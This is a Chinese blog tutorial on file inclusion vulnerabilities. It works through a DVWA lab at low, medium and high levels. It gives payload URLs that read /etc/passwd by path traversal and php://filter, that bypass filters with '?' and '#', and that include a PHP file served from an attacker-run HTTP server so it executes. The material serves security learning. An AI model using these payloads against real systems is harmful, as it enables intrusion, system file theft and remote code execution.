文件包含漏洞

已于 2023-04-22 18:59:35 修改
阅读量531 收藏
点赞数
分类专栏: 农夫安全学习 文章标签: 服务器 安全 网络 web安全 python
于 2023-03-20 22:08:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52263650/article/details/129663073
版权

学习自农夫安全A10

文件包含漏洞

定义

文件包含漏洞(File Inclusion)是一种最常见的依赖于脚本运行而影响 Web 应用程序的漏洞。当应用程序使用攻击者控制的变量建立一个可执行代码的路径,允许攻击者控制在运行时执行哪个文件时,就会导致文件包含漏洞。

程序开发人员通常会把可重复使用的函数写入单个文件中,在使用这些函数时,程序开发人员直接调用此文件,而无需再次编写函数,这种调用文件的过程一般被称为文件包含。此外,程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,导致文件包含漏洞。

分类

远程文件包含(RFI,Remote File Inclusion): 当 Web 应用程序下载并执行远程文件时,会导致远程文件包含,这些远程文件通常以 HTTP 或 FTP URI 的形式获取,作为Web 应用程序的用户提供的参数。
就是可以直接通过payload访问www.baidu.com的话就是远程文件包含了,这个要比本地文件包含危害大一些,可能可以通过这个拿到机器的shell

本地文件包含(LFI,Local File Inclusion):本地文件包含类似于远程文件包含,本地文件包含仅能包括本地文件,即当前服务器上的文件以供执行。

成因

本质还是因为权限控制的问题,给了出问题的代码过高的权限,以至于可以访问到机器上其他的敏感文件。

危害

攻击流程

DVWA(low)

我们可以看出这个页面直接在URL栏写出了文件名,可以怀疑有文件包含漏洞
在这里插入图片描述
我们先通过绝对路径访问敏感信息:passwd 文件
构建payload

http://192.168.48.137/vulnerabilities/fi/?page=/etc/passwd

在这里插入图片描述
我们再试试相对路径
构建payload

http://192.168.48.137/vulnerabilities/fi/?page=…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd

在这里插入图片描述

DVWA(medium)
看源码
在这里插入图片描述
防护思路是过滤传参
可以看到对于相对路径和远程访问做了过滤但是没有过滤绝对路径
所以payload还是

http://192.168.48.137/vulnerabilities/fi/?page=/etc/passwd

在这里插入图片描述

DVWA(high)
看源码
在这里插入图片描述

fnmatch() 函数的作用是根据指定的模式来匹配文件名或字符串。

匹配查看的文件是不是file开头,还有文件有没有include.php,不是或者没有则返回error
那我们让它有并且同时查看我们需要的敏感信息就行了
构建payload

http://192.168.48.137/vulnerabilities/fi/?page=file1.php…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd

在这里插入图片描述

getshell

各种姿势总结文章

无限制远程文件包含拿shell
传参的都当成php执行

创建一个phpinfo文件命名为php.txt
在这里插入图片描述
启动http服务器
在这里插入图片描述
构建payload

http://192.168.48.137/vulnerabilities/fi/?page=http://192.168.48.128:8000/php.txt

由于无限制即使传入的是txt文件也会当成php文件来执行

在这里插入图片描述
在这里插入图片描述

有限制远程文件包含的绕过
测试目标主机后端代码

<?php include($_GET['filename'] . ".html"); ?>

代码表示回向传参添加html后缀,导致远程包含的文件也会多一个html后缀,导致包含的文件被当成html文件来执行。

通过问号绕过

http://192.168.48.137/vulnerabilities/fi/?page=http://192.168.48.128:8000/php.txt?

通过“#”号绕过

http://172.16.3.186/test/yfi.php?filename=http://172.16.3.183/php.txt%23

PHP伪协议

定义
PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。 php://filter(本地磁盘文件进行读取)

元封装器,设计用于”数据流打开”时的”筛选过滤”应用,对本地磁盘文件进行读写。

条件
只是读取,需要开启 allow_url_fopen,不需要开启 allow_url_include;

用法

http://192.168.48.137/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=/etc/passwd
在这里插入图片描述
在这里插入图片描述

思考
其本质就是将包含的文件内容通过base64加密后再输出到页面上,可以绕过可能存在的对于输出内容的检测和拦截。当感觉目标站点存在这个漏洞的而页面没有输出的时候
同时还有一种思路,就是无论是注入还是输出的时候都可以通过加密的方式绕过可能存在的过滤。注入的时候是加密后传入目标站点后,再在其后端解密。

后记

2023.3.20 | 22:05

布里丹的毛驴
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 文件包含 web81
Kradress的博客
12-08 287
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 15:51:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
文件包含漏洞(详解)
最新发布
qq_70584783的博客
06-01 326
文件包含漏洞是一种允许攻击者通过操纵输入参数,使服务器端脚本错误地包含并执行了攻击者指定的文件的安全漏洞
文件包含漏洞全面详解
qq_53058639的博客
05-20 860
和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
文件包含漏洞实战
yuan_boss的博客
08-31 1320
可以看到,我们成功获取到了hosts文件,但是这并不能证明是文件包含漏洞,因为这仅仅是把hosts文件读取出来了,最多能确定的是文件读取漏洞,所以我们可以写一个把phpinfo.php放到www的一个目录中,我们尝试访问phpinfo.php,看看能否解析成功,解析成功了就说明是文件包含漏洞。我们仅仅可以使用文件包含漏洞,这个时候就需要考虑到php的一些封装协议了,利用封装协议,可以读取PHP文件源码,可以执行PHP命令。由上面的结果可知,我们利用php://input成功执行了php的命令。
文件包含漏洞详解
剁椒鱼头没剁椒的博客
12-01 4134
文件包含漏洞就是使用函数去包含任意文件的时候,当包含的文件来源过滤不严谨的时候,当存在包含恶意文件后,就可以通过这个恶意的文件来达到相应的目的。file : // #访问本地文件系统 http : // #访问HTTPs网址 ftp : // #访问ftp URL php : // #访问输入输出流 zlib : // #压缩流 data : // #数据 ssh2 : // #security shell2 expect : // #处理交互式的流 glob : // #查找匹配的文件路径。
文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
m0_64378913的博客
06-15 3023
概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。定义:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
Web应用安全文件包含漏洞简介.pptx
06-18
文件包含漏洞Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
08_理论8_文件包含漏洞的原理与实践_20180921
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
PHP 网络开发详解之远程文件包含漏洞
12-18
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。 复制代码 代码如下: <?php $file_name = $_GET[“filename”]; //获得当前文件名 include(“$file_name “); //包含文件 //一些其他...
php 伪造本地文件包含漏洞的代码
10-28
php 伪造本地文件包含漏洞的代码,大家一定要注意防范。
信息安全技术:文件包含漏洞简介.pptx
11-01
本文将深入探讨文件包含漏洞的概念、风险以及如何识别和防范这类漏洞。 **1. 什么是文件包含?** 文件包含,通常指的是在编程中,尤其是PHP语言中,通过特定语句(如`include`或`require`)将一个外部文件的内容...
第七式 七伤拳 web安全文件包含漏洞专题.pdf
06-22
tsrc线上培训资料 第七式 七伤拳 web安全文件包含漏洞专题
PHP文件包含漏洞深度解析
文件包含漏洞的原理及特点:当应用程序允许用户控制包含文件的路径时,就可能出现文件包含漏洞。攻击者可以通过构造特定的输入,使得程序包含攻击者指定的文件,这可能是服务器上的任意文件,甚至远程服务器上的文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值